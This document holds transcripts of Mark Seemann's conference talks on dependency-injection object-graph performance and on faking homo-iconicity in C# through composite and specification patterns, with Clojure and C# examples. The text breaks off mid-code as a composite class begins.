And basically what it's going to do when we invoke it is it's going to call this getData help of private helper method. And as you can tell, the getData private helper method actually expects the input to be a connection string. So I need to use the context as though it was a connection string. And it's simply going to create a new SQL connection, pick a random number between 1 and 10,000, do a select into a table that I have here on my local machine, just selecting the row that has this corresponding ID, and turn that into a string, return the string as data, and then I'm passing the data as context into the B3 node. And I'm doing this simply just because I didn't want the C sharp compiler to optimize away that data variable if it wasn't being used. So I'm sure that it's actually being used now. So we should expect this to be different when we try to use this one. So let's do the original playing graph and just use the database reading node instead. So get, let's say getGraph, readingDB, something like that. And obviously we should go database reading C1, and I need to pass in a connection string here. I have one already. So that's pretty much it. So let's have a look and see what that actually looks like. So that's just putting things into perspective. So the funny thing is that, so it clocks in at 2,300 ticks or 0.23 milliseconds. So the interesting thing, or the funny thing is that it seems to be about the same as this slow C1 node thing. It's actually just a coincidence. I've actually sometimes run this on my laptop, and it's been like 4,000 ticks instead of 2,000 ticks. But I think the point here is that compared to all the object graphs that we've created so far, if we just forget about this slow C1 node here, it's just orders of magnitudes, more work that's actually required actually reading something out of a database. And you would probably, I mean, I would guess most of you work with code that does some sort of IO. If you don't talk to SQL Server, you probably talk to some other sort of persistence engine that's on a different part of the network than actually the machine that's running your code. So I think you were, most cases, the most customers that I've actually consulted would be very, very happy if they could have a round trip to that database that on average took 0.2 milliseconds. Usually when we do database access, we measure the access time in milliseconds. The reason why this is fast is not because I'm a hot developer or anything, it's just because I'm running SQL Server on my local machine. The table's not very big, so it's probably fit into memory. There's no network latency at all involved, and I'm doing a lookup on a primary clustered index, and there are no joins involved. So you can't really make a database lookup that's much faster than that anyway. But even so, it's just a completely different thing. So I think the whole point that I'm trying to get across here is that you shouldn't really worry about the composition time and all of the performance implications of doing loosely coupled code because the real work in your application probably happens somewhere else, and that is probably what you should worry about. But I still hear people all the time being worried about the performance implications of using inversion of control. And I hope I've been able to convince you now that you don't really have to be worried about those things. So to wrap up, do defer composition until you actually know what it is that you need to compose. 
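A sketch of what that database-reading node might look like; the table and column names, and the exact SQL, are assumptions used only to illustrate the shape of the code:

```csharp
using System;
using System.Collections.Generic;
using System.Data.SqlClient;
using System.Linq;

public class DatabaseReadingC1 : INode
{
    private static readonly Random random = new Random();
    private readonly INode b3;

    public DatabaseReadingC1(INode b3) { this.b3 = b3; }

    public IEnumerable<INode> GetUsedInstances(string context)
    {
        // The context is treated as a connection string, and the data that
        // comes back is passed on as the context for the child node.
        var data = GetData(context);
        return this.b3.GetUsedInstances(data).Concat(new INode[] { this });
    }

    private static string GetData(string connectionString)
    {
        var id = random.Next(1, 10000);
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(
            "SELECT [Text] FROM [SomeTable] WHERE [Id] = @id", conn))
        {
            cmd.Parameters.AddWithValue("@id", id);
            conn.Open();
            return (string)cmd.ExecuteScalar();
        }
    }
}
```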
And you don't have to worry about startup time because usually it's not going to be a problem. You are looking at an object-oriented framework. It creates objects blindingly fast. And if you ever get into that sort of problem, or the situation where it is a problem, you can use this virtual proxy or this lazy initialization pattern to get around that. Object count also should not be an issue either because you can reuse objects across various requests. So that will actually make things very, very efficient. It might actually make things more efficient than what you could do if you used tightly coupled code because you can control at composition time whether you want to reuse things or not. When you write tightly coupled code, you're pretty much saying, new, new, new every time, so you're creating lots of objects. And there's really no way to change your mind about that. So I would actually say you can write much more efficient code writing loosely coupled code because you can change your mind about how you want this composition to happen after you've measured how it actually turns out. All right. So that's pretty much what I have. My name is Mark Seemann. As you can tell, I have this book called Dependency Injection in .NET. It's still available in bookstores or online if you don't have it. I would definitely recommend that you go and buy it so I can earn a little bit of money. If you have questions, I have six minutes left. Otherwise, welcome to contact me. All my contact information is on the blog or here on Twitter. But let's see if we have any questions or if you just want to go to lunch. No questions? All right. Going once, going twice. All right. Thank you all for coming. Have a good day the rest of the day.
|
A corollary to the Composition Root and Register Resolve Release patterns is that object graphs should be composed up front, sometimes well in advance of when a particular dependency is needed. Such object graphs can potentially become quite big, which tends to make some people uneasy. Isn't it terribly inefficient? No, it almost never is, and in the few cases where it is, there are ways to get around it. This session examines big object graphs composed with and without Dependency Injection containers, using simple code examples.
|
10.5446/51473 (DOI)
|
So, good afternoon everyone. I guess that if we apply a strict algorithm to this greeting, I think it's still in the afternoon, but it's very soon the evening, so I could say good evening to you instead. So, this is the last talk of the day. I hope that you have had a good conference so far. The talk is called Faking Homo-Iconicity in C# with graphs. My name is Mark Seemann and I am an independent consultant and advisor who dabbles in object-oriented design, functional programming, test-driven development, software architecture, those kinds of things. I'm also one of the founding partners in a company called Green that's just getting off the runway at the moment, and one of my partners recently told me a story. So, he went to Moscow to meet with some potential clients of ours, and while meeting with those clients, he had to go to lunch with them. Horrible, yes, but sometimes necessary. No, I'm just kidding, really. And apparently that lunch restaurant that they went to was kind of a fancy place because after they were seated, each guest was given an iPad, and on that iPad was a custom app that you could then use, and obviously you could read a little bit about the restaurant, but you could also peruse the menu and figure out exactly what you wanted for that particular lunch. So, you could make your selection, and maybe you could even customize that selection with extra caviar, it is Russia, right? So, you want extra caviar with that. And then when they were all done, they would, you know, the waiters would come back and collect the iPads, so they weren't given the iPads, it was just, you know, for loan. So, the waitress took the iPads and then she went to the next table over and just put the stack of iPads on the table and looked at the first one, the top one in the stack, and then pulled out a pencil and a piece of paper and started copying off all the, you know, entries that they made onto a piece of paper. And then, you know, in an old fashioned way, went out to the kitchen and gave the cook that piece of paper. So, that's so much for fancy iPad digitalization of the restaurant business. So, apart from being a slightly funny story, it also highlights that doing complex data entry and processing is sometimes harder than we actually think it is, or we tend to underestimate the effort that goes into those sorts of software systems. And that is something that I want to talk about today, one of the topics or one of the themes for this talk. So, on the agenda for the next hour, slightly less than an hour now, is I want to talk about three things. So, first of all, I want to introduce this concept of homo-iconicity for those of you who are not familiar with it. And those of you who are familiar with it, you just bear with me for a little while because I'm not going to spend that much time with that. And then, when I've talked about this, there comes this realization that this is not something that we can do in our normal programming languages like C#, Java or anything else. So, what then, what can we do then? It turns out we can actually fake it. And the way that we can fake it is by using polymorphic object graphs. And it turns out that when we start doing this, we can actually do interesting things with those polymorphic object graphs like transforming and manipulating those graphs. So, that's basically the plan for the next 40, 55 minutes, I'm sorry. So, the overall problem that I'm trying to address here is this problem of how do we deal with complexity in software?
So, how do we know that the software that we're building actually works? How do we know that it works as intended? How do we report to the business owners, the people who pay our wages, that we actually implemented what they think they asked us to implement? And how do we make it easy to continually get new requirements and implement those and report back to the business owner? So, you're probably sitting there now and thinking, oh, he's going to talk about behavior-driven design. We kind of heard this before. And I'm not going to talk about behavior-driven design at all, apart from right now. And it's not that I have anything against behavior-driven design at all. I don't. But it's just not my agenda for today. My agenda for today is to talk about how can we actually design code and reason about code in a way that also addresses some of those problems. So, if you like behavior-driven design, there's no conflict in what I'm going to tell you today and behavior-driven design. So, you can do both if you want to. So, but it's not a behavior-driven design talk at all, just to make that clear. All right. So, let's start talking a little bit about homo-iconicity. So, what is this thing actually? So, it turns out that certain languages have this property of homo-iconicity. So, it's something that's built into the language. And basically what it means is that code is expressed in the same way that you would express any other sort of data structure in that language. So, you could say that the code you write is just a special case of any other sort of data in that programming language, which means that if you know how to manipulate data in that programming language, you also know how to manipulate code, which makes metaprogramming very easy. So, if you ever dabble with reflection in C# or similar languages, you will know that it's, well, it's not impossible to write reflection code, but it's just orders of magnitude more difficult than just writing your normal C# code or Java or whatever you're working with. So, homo-iconicity is a property that some programming languages simply have. And it's not like most programming languages have this property. Actually, it's not that many. The most famous language family is Lisp and all its variations. And there's a modern variation of Lisp, a modern dialect of Lisp called Clojure. And I'm just going to show you a five-minute demo of Clojure and what homo-iconicity looks like in Clojure. So, if you've never seen Clojure before, don't despair. I'm just going to do hello world. And for the rest of the presentation here, I'm not going to spend any more time actually doing any sort of Clojure code. So, I'll stick with C# for the rest of the day. So, I'll do hello world. And the first thing I want to do is define a function. So, I can define a function called hello. Maybe this, let's just start over again. This IDE is a little bit, I think it's an alpha IDE. So, let's see where it gets me. But basically, I can say define a function called hello that takes an argument we call subject and concatenate the string hello with the subject. So, that's basically my function here. So, I can try to invoke that function. And as you can tell right now, it's throwing an exception saying that I passed the wrong number of arguments to that function because I passed zero arguments to that function and it actually expects one argument into the function. That's the subject thing that sits there. So, I can do that.
So, I can say hello and NDC and everything works fine and you can actually tell that if I change this, it actually updates on the fly. So, it actually works, which is nice. But the thing that happened when I just started typing hello with those parentheses around is that when you have parentheses around something in a list, that means you are creating a list of things. And almost by convention, but this is actually one of the very few rules in the language, by default the reader, which is more or less what Clojure calls the compiler, it's slightly different, will try to interpret the first element in a list as though it was a function and will try to evaluate that function using all the other elements as input into that function. So, that's why it's complaining right now because I have parentheses around that. So, we can define, you know, all sorts of different things as lists. So, I could write the list one, two, three, but then I would get another exception saying you can't, one is not a function, so you can't evaluate that. So, we need a way to stop evaluation from happening and we can do that by putting this little backtick in front of it. So, that's called a syntax quote. So, we can actually do that with the code that I have up here as well. So, I can just syntax quote that. Now, it's no longer a function that's being created. Now, this is just data. This is a little bit hard to see, but I can define a new symbol and I can call that hello data and just close this definition off. And now, you would actually see that, oh, that's a little bit difficult to see. There we go. That this is actually now just the data itself and I need to do one thing also because everything is namespace qualified and I need to unqualify this subject here because it's just a local, a local symbol. So, I can still evaluate this code. I just need to force evaluation now. So, I can say eval, hello, data. That just returns a function and then I can try to evaluate or to actually call that function by putting parentheses around that one and then it gives me the same exception as before, but I can then go and pass in the argument and you see everything works okay. All right. So, we can not only treat code as data, we can actually query the data as well. So, I could pull out elements of this list. So, I could define a new symbol. I can call that decl for the declaration and I could say, let me take the first two elements from hello data. So, any of you who are familiar with LINQ would probably know the extension method called take and you can say take two and that's exactly what I'm doing here at the moment. I'm just taking the two first elements out of my hello data and that's the defn macro and the hello symbol. And I can also take the rest of it out so I can define body, not with take. In C# in LINQ we would call it skip two. In Clojure it's just called drop two, but the idea is exactly the same. So, I can simply just drop the two first elements and then get the rest in that list and I have two other elements here. I have the subject which kind of looks funny now because it's being unquoted, but never mind that. And then I have another list which is the second element. So, notice that we have lists within lists and we can have lists within lists within lists within lists and nest our programs in this way. So, this is almost like a tree or a graph. If you will, this is actually a tree because lists can be nested in that way.
So, keep that in mind when I, I'll talk about how we kind of learn from this when we do C# code because I will be talking about graphs and trees and things like, funny things like that. All right. So, I would like to define a better version of this hello function because I would like to define a version that takes zero arguments, or I would like to add an overload that takes zero arguments while retaining the stuff that I already have. So, I'd like to modify what I have at the moment and actually create a better hello function out of this. So, I could take and just put those things together again, but I would actually like to update this and do something, make it better. So, I'd like to create a function overload for this that takes zero arguments. So, I can't modify the existing list because Clojure is a functional language. So, it doesn't allow me to mutate a list, but I can create a new list out of the existing lists that I have here. So, let me first define another symbol, I can call that default body, that just contains the body of the overload that doesn't really take any parameters. So, I'm going to quote this and I'm going to say the empty arguments vector, which just looks like that, which would map to a default string which is hello world. So, you can see I just have the empty argument that maps to hello world. All right. So, now let's put these things together. So, I'll define a better hello and I'll just define the data for the better hello function and then I can evaluate that afterwards. So, I want to concatenate those lists together. So, I can say concat, concat if I could spell, and I could start with decl which just gives me at the moment just the decl symbols because that's all there is in it. And then I want to take the default body and add that, and I need to add it as a list, but I need to expand the symbol here. So, without getting into Clojure details, I'll need to do this and then do default body. So, for those of you who are interested, I think there are more Clojure talks tomorrow or on Friday. So, maybe otherwise come and ask me afterwards why I'm doing the backticks and the tildes and so on. But this pretty much just expands into concatenating those three things together and I can now go and, let's see if I can go and eval that better hello data. Let's see. There we have it. So, that's a function and now if I try to evaluate or actually execute this function I'll get hello world. Before, you remember, I just got this exception saying you can't pass in zero arguments, but now I actually can because I just added this overload to the function and I can still pass in NDC and actually get the original behavior back still. So, you'll notice that what I did here, I treat code as data and then all of those take and drop and concat functions and so on, they are not designed particularly to manipulate code. I could use those functions to manipulate any sort of data at all. They're just designed for general purpose data manipulation, but it just turns out that I can also use them to manipulate code. And actually, when you look at Clojure code, this is what builds up the basis for a very, very rich macro system that Clojure has.
And I'm pretty sure that anyone who's actually writing real-life Clojure will now come and tell me that this is not at all idiomatic Clojure code, but I think it gets the point across, I hope it gets the point across, that you can actually manipulate code as though it was data and that's actually what I'm trying to tell you here. So, enough of the Clojure code, although it's very exciting, let's talk about some object-oriented code. Let's talk about C# code. So, what about C#? C# is not homo-iconic. Homo-iconicity is something that's built into the language and it's just not built into C# and I can't see how that would ever happen because the syntax of C# is not something that even remotely resembles data structures in C#. And we shouldn't feel bad about this because, you know, Java is not homo-iconic and, you know, lots of popular languages are not homo-iconic. But still, we can learn from this. We can get inspired by this. So, it turns out that if you have a certain type of problem, you can actually fake homo-iconicity. And what I'm talking about here is not, I'm not talking about trying to somehow treat your low-level C# code as though it was data. So, I'm not talking about building up a DOM here and trying to query the DOM. What I'm talking about here is that you can build a specialized domain-specific language for certain types of problems and then you can actually build into that DSL, you can actually build in something that very closely looks like the programming constructs that you're used to working with, like an if statement and a loop and so on. So, it's very well suited to decompose procedural code, for example. And that's what I'm going to talk about today. So, it's not a general purpose approach, but it's just an approach that has proven valuable to me so many times that I thought that this is a good time to actually share it with other people. Right, okay. So, first, let's look at a demo. I'll just walk you through some code that gives us a motivating example. So, I'll switch to Visual Studio now. And I don't know if you can read this, but I'll just walk you through this. So, the scenario is based on, it's actually based on real-life code that I saw a couple of years back. So, I worked as a consultant for a company that lived off, a company that did mortgage loans. So, you want to buy a new house, you want to take out a loan in that house in order to be able to buy it. So, that's something you can do in Denmark. You can actually take out a loan in something you don't own with the guarantee that you will own it. So, kind of funny thing. Anyway, so, this company collected a lot of data from potential customers. So, when a customer contacts this company and says, I'd like to take out a loan in this house that I'm thinking about buying, they say, well, that sounds very interesting. Let's just hear, you know, your entire life story because we want to know who you are and whether we actually want to extend that loan to you. So, they collect a lot of data. So, I just try to simplify this a little bit. So, in the end, in the center here, I have this thing called a mortgage application. So, an application here is not a software application. It's because you're applying for a loan. So, that act of applying is an application. So, that's the mortgage application. It contains some data about the applicants. There might be a primary and a secondary applicant and so on. Each applicant has contact data. Contact data has addresses and so on.
The mortgage application also has information about the properties that you're looking to buy. Maybe you also have information about the property you already own because the applicant might want to, you know, sell their current home to move to a new home. And those properties have addresses as well. And then there are some enumerations and other stuff going on. So, imagine that this is just my paraphrase over that company's code. Imagine that this was just a lot more complex than what we are looking at at the moment, you know, many more classes. And these are just very dumb DTO-like classes. So, there's no behavior in this. This is pure data structure. So, what they want to do with that sort of thing is to produce, you know, to somehow treat or manipulate that data. So, they want to process that data. So, they have this mortgage application processor here that has this one entry point method called produce offer. It simply takes one of those mortgage application instances and then it produces something called eye renderings. And the reason why they wanted to do that is because when they've collected all this information from the customer, the potential customer, they want to extend an offer letter with details about the loan offer that they're actually extending towards that customer. And that may actually be a lengthy process because it might involve a human that needs to sign off on it or it may involve some sort of batch job that's running on a mainframe but only running at night. So, you can't just, you can't just do it online necessarily. You have to actually submit this to something and wait for the results to get back. So, this is kind of a big process. So, if anyone is familiar with the term transaction script which is something Martin Fowler describes in the patterns of enterprise application architecture, what we have here is a transaction script. And I'll just walk you through it in a moment. I'll also show you the output. So, the reason why they're outputting eye enumable of eye rendering, eye rendering is just a custom interface that I just made up here but pretty closely resembles what they were actually doing. The reason why they did that was they wanted to produce that offer letter in some sort of, I think they actually produced it in PDF. So, they were talking to a third party component. So, they needed to have all those renderings. So, like they had, you know, a plain text rendering, a boat rendering, a headline rendering and so on. So, they could kind of use that polymorphic type and then that could actually render into PDF. And that's actually a pretty good design decision because you could always change your mind and render into something else at a later date. So, that makes sense. But don't think that I'm trying to teach you how you should do text renderings because there's all sorts of other, you know, template-based methods that you could do to actually, you know, render a letter. So, I'm just using this as the best example that I've seen so far of this technique. So, I'm just having this transaction script here. So, I'm just slowly going to scroll through this so you can actually see how much code there is. And I've just made this up to look like what they had. And you would notice that there are, for example, code comments sitting in between here. So, we can actually have an idea about, you know, this section probably belongs together because it sits between two code comments and so on. 
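A rough sketch of the shapes involved, based on the description above; the exact members of the DTOs are assumptions, and the real model was much larger:

```csharp
using System.Collections.Generic;

// The rendering abstraction, implemented by e.g. text, bold and headline renderings.
public interface IRendering { }

// Heavily simplified, behavior-free data structures.
public class Applicant { /* contact data, addresses, ... */ }
public class Property  { /* address, valuation, ... */ }

public class MortgageApplication
{
    public Applicant PrimaryApplicant { get; set; }
    public Applicant SecondaryApplicant { get; set; }
    public Property DesiredProperty { get; set; }
    public Property CurrentProperty { get; set; }
    // ...many more dumb data properties...
}

public class MortgageApplicationProcessor
{
    public IEnumerable<IRendering> ProduceOffer(MortgageApplication application)
    {
        var renderings = new List<IRendering>();
        // ...hundreds of lines of transaction script populate the list here...
        return renderings;
    }
}
```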
And I can just scroll down here to the end and you can see that I have maybe, I have 263 lines of code. So, imagine that this is just an example. They had thousands of lines of code that all looked like this. And if I scroll up again, you will see that I have, for example, a switch statement here that has three cases on it. This becomes interesting in a moment. I have an if statement here. And I have another if statement sitting a little further up. So, here's another if statement. So, two if statements and a switch case. A switch statement. So, that's pretty much it. The only thing that I want to point out as well, well, let's just run this so you can get an idea about what it looks like. So, it just looks like a letter more or less. So, I'm not rendering to PDF because I don't know how to do that. So, I just decided to render to mark down instead. So, on the left-hand side here, you have the mark down that I render. And then on the right-hand side, you have the actual, how that mark down might actually render. So, you will see here's just an awful letter saying something Oslo, 12th of June, 2013, blah, blah, blah, blah, blah. And then there's a lot of details about stuff. And then there's the loan offer with the fixed rate offer. All right. So, that first line of code, that first line in the letter here, Oslo, 12th of June, 2013, actually turns out to be interesting because how is that actually produced? That is produced by, you know, the first thing this thing does is it just, you know, creates a list of I renderings and then it says renderings.add a text rendering. And the text in that text rendering is then the result of calling something called a location provider, which is a dependency, which is an interface, and you call into something, get a current location name. And you concatenate that with, you know, the time provider as well. And then you just move on after that and never really use those dependencies again. All right. So, that's just the motivating example. I'm not saying this is how you should write code, but that's actually how they did write code. And the funny thing is when I consult people and talk to people about how to do test-driven development, they pull out code like this and then they ask me, so how would you arrive at code like this if you did test-driven development? And I kind of go, if I did test-driven development, I would not arrive at code like this. And I don't necessarily mean that as a criticism. It's just very, very, very difficult. I would almost say almost impossible to arrive at code like this with test-driven development. And I'll explain to you in just a while why this sort of code is so darn difficult to unit test. So, we started talking about how could we actually make this more testable because that was one of the problems that they had that they didn't really know how to test this code. The other problem, it turned out when we started talking about it, is that they, it turned out they actually had to document to their business owners what that transaction script actually did because it actually contained a lot of very, very important business logic. So, these sorts of things change on a regular basis because, you know, you want to do all sorts of different risk analysis on the people who apply for a loan and you want to change what goes into the letter depending on the risk profile of the applicant and so on. So, lots of different things actually happening there and that changes on a regular basis. 
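Based on that description, the first block inside the ProduceOffer transaction script might read roughly like this fragment; the TextRendering constructor and the provider method names are assumptions apart from GetCurrentLocationName, which is mentioned in the talk:

```csharp
// Date and location
renderings.Add(new TextRendering(
    this.locationProvider.GetCurrentLocationName() +
    ", " +
    this.timeProvider.GetCurrentDate().ToString("d. MMMM yyyy")));

// ...more blocks separated by code comments follow for hundreds of lines,
// interleaved with two if statements and a switch statement...
```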
So, the business needed to know what was actually happening in that software because they wanted to know that they actually did the right thing. So, they had to somehow find a way to report that to the business owners. And it was actually even worse because it turned out that they also needed to be able to take in requirement from business owners. And the way that did that was, I think it was an Excel spreadsheet. So, they had a spreadsheet that said, you know, print this, print this, print this. If this is true, then print this, else print this. So, they almost had like, you know, sudo code there but something that the business owner could understand. Why could the business owners understand it? Well, because it was in Excel, obviously. But anyway, so, but they spent a lot of time actually going back and forth on this because that was actually why the code looked like it did. That was actually why they had this transaction script because that was the only way they could actually figure out a way to mentally cope with this whole idea about they having thousands of lines of code and still somehow translating that back and forth to that Excel spreadsheet and they could actually deal with that. And, you know, if they had refactored this out into lots of helper methods and so on, that would just have been mentally impossible for them to do. It was hard enough to do already. So, I'm not actually criticizing these people. They had actually a very, very nice looking code base. I think it was pretty easy to understand what that transaction script actually did. They were very disciplined with how they worked with that but there was just still a hard problem for them to solve all those things. So, the reason why this is difficult to test is something that's kind of interesting. So, first of all, I talk about I have two if statements and a switch case statement in this thing here. And you can imagine that what they actually had was, you know, dozens of different if statements and nested if statements, so if statements within if statements and so on. And it turns out that if you want to cover all pathways through code base like this, well, the first if statement you encounter, you have two different pathways that you can go through that system. And then you encounter another totally independent if statement. Now, you have two more but that's two by two. So, that's four. And then you have that case statement that, you know, effectively has three different pathways. So, you multiply that as well. So, you say, well, that's 12 pathways through the system. That means I need to write a maximum of 12 test cases. That doesn't sound so hard. And I agree because this is sample code. That does not sound so hard. But I don't know if you can imagine if you start just adding a few more if statements. So, I think the sixth or the seventh if statement you add to this, you actually already cross the barrier into the hundreds of test cases. So, this is a combinatorial explosion of the pathways through the system that you need to do. So, it's not unrealistic if you have a transaction script like this that you would actually need hundreds if not even thousands of test cases to be sure that you actually cover the entire system. And then you go, well, let's just pick, you know, representative test cases and test those. But how do you know which ones are actually relevant? So, it's already at that point it's actually pretty hard to figure out how do we test a system like this. 
So, the next thing is you notice this time provider and location provider that I had. It sits in the very first real line of code there that calls into a time provider and a location provider to actually get some data out of that. And the way that we normally, when we unit test, the way we normally deal with dependencies is that we replace the dependencies with test doubles. And the way we normally do that is by using some sort of mock library, a dynamic mock library like Moq or Rhino Mocks or NSubstitute, whatever. And as you probably know if you've ever done this, you need to configure a mock to actually tell it, well, when you are called you should return this particular thing back. And if you don't do that, it's probably going to throw an exception because it got a call from the actual code but it didn't know how to respond to that call and then it just gives up and says, well, I don't know how to deal with this, I'm going to give up. So, effectively this first line of code that I showed you acts as a guard clause. You can't really get past that unless you configure your mocks. So, again, imagine that in a real system you don't have just three dependencies, maybe you have ten dependencies or even twenty dependencies and they all act like this. So, for each test case you have to configure, let's just say, ten different mock objects. So, you can multiply that by the thousands of test cases you already have and you have tens of thousands of mock configuration statements that you need to maintain. And then someone comes by and says, you know what? I think we should change the way this dependency interacts with our system and you just go, no, absolutely not, because you know you have to change ten thousand lines of code, of test code, that will break if you do that. And that leads people to say, you know, mocks are evil. And actually if you go by a book called Growing Object-Oriented Software, Guided by Tests, one of its messages is that, you know, you should listen to your tests, and what the tests are trying to tell you in this hypothetical situation is that you have to decompose the code. Let's get back to that in a moment. So, the third problem with code like this is that the input is itself very, very complex and you need to populate this entire input class in order to actually get all the way through because various parts of that transaction script will depend on parts of those data elements actually being available. So you also have a lot of maintenance nightmares sitting there and waiting for you. So lots of problems with this sort of code. So we really, really need some way to decompose code like this. It would be really, really nice if we could somehow treat the code as data. So let's think back to this idea about homo-iconicity. Could we somehow model this code as though it was data? And it turns out we can actually do that if we introduce some sort of domain-specific language, or try to extract some sort of domain-specific language out of this thing, and build a graph, an object graph, out of those things. So the idea here is that each node in that object graph will represent one part of that procedural program. So basically everything that sits between two of those code comments, we could think about that as a block or a node in that particular program. And we can actually take this a little bit further because if we define a common interface out of this, I'll show you that in a minute.
If we do that, we can actually not only just pull out the different blocks and treat them as statements in that higher level language, but we can actually also emulate familiar constructs, coding constructs like if and switch and so on. So the building blocks for doing that is to extract all that domain specific code, all of those building blocks out of the transaction script, and then just use a few common well-known patterns, one called composite and one called specification, to create those well-known building blocks like an if statement or a switch statement and a list of statements and whatever you'd like. So imagine that we're looking at that first line of code that I've been talking about all the time, so this thing that does this Oslo, the 12th of June, blah, blah, blah, this is that code. So it sits between two comment codes. So we think that's probably a block that we want to somehow refactor. So the first thing we could think about doing is to just take this and extract this into a private helper method. So your IDE can do that automatically for you, particularly if you use resharper, then this happens very, very easily. So now you have this helper method that does exactly the same thing as before. So that doesn't really get us very far, but that's just the first step in the refactoring. So you'll notice that this helper method takes as input a list of I renderings and then it just renderings.add just like before and then it returns void. So it does exactly the same thing as before, but I'd really like to see if I could somehow morph the signature of this helper method into a signature that looks like the containing method. So the containing method is called produce offer, takes in a mortgage application and returns I enumable of I rendering. So the first thing I want to do is instead of taking in a list of I rendering that I can add to, I just want to return an I enumable of I rendering instead. So instead of doing renderings.add, I'll just do yield return instead and you will also notice that I changed the signature of the method itself. Now it doesn't take any input, but it returns I enumable of I rendering instead. So I'm not quite there yet, but I'm moving towards the direction where this method looks like the other method. So at the calling point, it originally looked like this when I refactor or when I extracted the code, I just pass in renderings to that method and after I do the refactoring of the signature, it just looks like this instead. So I have renderings.add range and I just add that range of I enumable that's coming in. So it still works at the call point, if you will. You have a question? No? No one? All right? Okay. So the next thing we can do is then we want to morph the signature of this helper method into something that looks like the signature of the containing method. So the containing method takes a mortgage application instance as input. So we can add this to this helper method as well. Even though we don't need it, I just added it because now it looks even more like the containing method. All right? Okay. So I can make it public instead of having it private. And this is where, you know, people who are not used to TDD go like, why are you, you made something, you made it public just for testability purposes? And I'm kind of like, yeah, I did, but what's the harm in that? I mean, there is no, there's no break, breaking of encapsulation here because what could happen if someone from the outside calls into this method? 
It doesn't change any internal state at all. It just produces those eye rendering. So we could call this as many times as we want and not break anything. So it doesn't really break any, it doesn't really break encapsulation. So I think that's, that's a perfectly fair thing to do because already at this point, we could actually start unit testing this helper method and just figure out whether that helper method actually does what it needs, what it needs to do in isolation. So that would actually be pretty nice if we just do this for all the blocks in our transaction script and just say, well, now we can unit test all of those helper methods in isolation, but we have one problem left. And that is, we know that all of those helper methods work in isolation, but we actually don't know if the overall script actually calls those methods or whether it calls them in the correct order or whatever else happens. So we need to go a little bit step further and we're not really at the point yet where this is starting to look like data. This is just a helper method and a helper method is not really something that is, that in an object oriented language, we can treat as data. But if we extract this into a class, then we can start treating it as data because what is object orientation all about? Well, classes are, you know, data and behavior. So that is basically what we have here. I have some behavior, that is to produce date and location renderings method, and I have some data, which is the location provider and the time provider that I pulled into this class as well. So now I have something that is beginning to look a little bit like data. It also has behavior, but now it also has data because it has these two providers that it's carrying along. So at the moment, I have two methods that are public in two different classes that take mortgage application as input and produces I-enumable of I rendering as output. They just have two different names. So let's have a look at the name and change this name to produce offer. So now I have two methods that have the same name and the same signature. So that is beginning very, very much to look like they implement a common interface. So we can now extract an interface out of this and say, well, this data location mortgage application processor, very enterprise name, I know, implements this I mortgage application processor interface that I just extracted from that produce offer method. And I can do this with all the different parts of that transaction script and have them implement this I mortgage application processor. So seen from the outside, they look like the same. They have the same interface. And they contain data as well as behavior. So just as a side note, stuff like this is really, really easy to test. So I don't know if you can read the unit test in the back, but the important part isn't actually how you would unit test this. If you're very, very interested in that, this code is actually also I uploaded it to GitHub a couple of hours ago. So you can actually go and look at that. But the point here is to test the main behavior of this class, you need one, two, three, four, five, six coding statements. And that's pretty much what you need to test that part of your system. You probably need a few auxiliary unit tests as well to see that it has the rig that it implements the great interface and so on. But that's basically it. So it becomes very, very easy to test each of those things in isolation. 
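Pulling those refactoring steps together, here is a hedged sketch of roughly what the extracted leaf class and its interface end up looking like; the TextRendering type and the provider member names are my assumptions for illustration, while the class and interface names follow the talk.

```csharp
using System.Collections.Generic;

public interface IMortgageApplicationProcessor
{
    IEnumerable<IRendering> ProduceOffer(MortgageApplication application);
}

public class DateAndLocationMortgageApplicationProcessor : IMortgageApplicationProcessor
{
    private readonly ITimeProvider timeProvider;
    private readonly ILocationProvider locationProvider;

    public DateAndLocationMortgageApplicationProcessor(
        ITimeProvider timeProvider, ILocationProvider locationProvider)
    {
        this.timeProvider = timeProvider;
        this.locationProvider = locationProvider;
    }

    public IEnumerable<IRendering> ProduceOffer(MortgageApplication application)
    {
        // No internal state is changed; calling this repeatedly is harmless,
        // which is why making it public does not break encapsulation.
        yield return new TextRendering(
            this.locationProvider.GetCurrentLocation() + ", " +
            this.timeProvider.GetCurrentTime().ToShortDateString());
    }
}
```

A test of this class only needs to supply the two providers and assert on the returned renderings, which is the handful of statements mentioned above.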
And now you have a lot of those things where you know that each concrete implementation of I mortgage application does what it's supposed to do. And you also know that they have the same shape. Now you can combine them into something called a composite. So composite is a design pattern that is described in the original gang of four design patterns from 1994. So this is the design pattern we've known about for almost 20 years. It's one of the most powerful object oriented composition patterns available at all. I use it all the time. I can't get my hands down because I just love the composite pattern so much. It's really, really powerful. So what we have here is a composite mortgage application processor and it implements I mortgage application processor. So it's the same interface as those specialized leaf nodes, if you will. But it also composes an array of other I mortgage application processors and those could even be different concrete classes because they just have to implement the same interface. So that's what we're talking about when we talk about polymorphic graphs. And the way that it implements the produce offer method is simply just by saying, well, for each of the nodes, for each of the I mortgage application processors that I compose, it will call produce offer on that node and then it will concatenate all of the renderings together. So if you're not familiar with this built in links and tags, this is just a select many statement if that's better for you. So it just concatenates all the renderings into a stream of renderings and then returns all of those. So the caller doesn't really notice the difference. The caller just sees that this is a single I mortgage application processor. But behind the scenes, it has behavior because it composes the behavior of all the other things. But the interesting thing here is it also has data because that node, I just made it a field but I could have made a properties. Well, that node's fields is public. So you could actually just walk up to this composite and have it list all the nodes that it contains and then you would know that because you know the behavior of this is correct, you know that, you know, the order that the nodes actually appear in is also the order that they will be invoked in. So you know that if you just know the, which concrete nodes are composed into this composite, you also know how it's going to behave. Right. So, and also an interesting thing about composite is you can actually compose a composite into a composite because a composite itself implements I mortgage application processors. You can have nested composites here if you think that's interesting. That is often very interesting to do. You just need some leaf nodes at the end and that's all those specialized nodes that I talked about before that you extracted out of that transaction script. All right. So the composite solves the problem of how do we actually know that all the statements appear in the correct order but what if we also need to know that some nodes should only be invoked if certain conditions are true and to answer that question we have to pull in another design pattern which is a little bit newer. It's described various places but I first read about it in this book called Domain Driven Design by Eric Evans. It's called the specification pattern and pretty much it's just a very verbose way of saying here's an if statement or here's a predicate. So this is just your object oriented way of having a predicate. 
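A sketch of the two general-purpose building blocks just described: the composite, and the specification-as-predicate interface it will be combined with in a moment. The field and member names follow the talk where it names them; the rest are assumptions.

```csharp
using System.Collections.Generic;
using System.Linq;

public class CompositeMortgageApplicationProcessor : IMortgageApplicationProcessor
{
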